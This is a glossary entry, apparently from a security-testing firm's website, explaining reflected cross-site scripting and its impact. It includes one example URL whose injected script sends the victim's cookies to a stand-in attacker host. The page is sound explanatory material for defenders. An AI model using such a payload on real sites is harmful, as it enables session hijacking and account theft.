Skip to content
Fast-turnaround security assessments available — 10+ years development & security experienceGet started
Back to Glossary
Glossary2 min read

Reflected XSS

A cross-site scripting variant where malicious script is reflected off the server in the immediate response, typically via a URL parameter.

Reflected cross-site scripting (XSS) is a vulnerability where an application includes user-supplied input in its HTTP response without proper encoding or sanitization. Unlike stored XSS, reflected XSS payloads are not persisted on the server. Instead, the malicious script is embedded in a crafted URL or form submission, and the server reflects it back in the response, where the victim's browser executes it.

How It Works

The attack begins when an attacker identifies a parameter that is echoed back in the page's HTML. For example, a search page that displays "Results for: [search term]" might render the search term directly into the HTML without encoding. The attacker crafts a URL like https://example.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> and tricks a victim into clicking it through phishing, social engineering, or embedding it on another website.

When the victim clicks the link, their browser sends the request to the legitimate server, which includes the malicious script in the response page. The browser has no way to distinguish the injected script from the legitimate application code because it is served from the trusted domain. The script executes with full access to the page's DOM, cookies, and session data, enabling session hijacking, account takeover, or defacement.

Reflected XSS can occur in various contexts beyond simple HTML injection. If the reflected input lands inside a JavaScript string, an HTML attribute, or a CSS context, different escape sequences are needed to break out and inject executable code. Modern frameworks that auto-encode output have reduced but not eliminated reflected XSS, as developers can still use unsafe rendering functions or inject into contexts where HTML encoding is insufficient.

Why It Matters

Reflected XSS requires social engineering to deliver the malicious URL to a victim, which makes it slightly less impactful than stored XSS in some risk models. However, it remains a serious vulnerability because it executes in the context of the trusted application's origin. A single reflected XSS finding can enable complete account takeover if session tokens are accessible to JavaScript. Security assessments test every reflected parameter for XSS because the vulnerability is common and the impact is consistently high.

Need your application tested? Get in touch.

Related terms

PayloadSame-Origin PolicyStored XSS

Go deeper

Read full article

Need your application tested?

We find these vulnerabilities in real applications every day.

Request an Assessment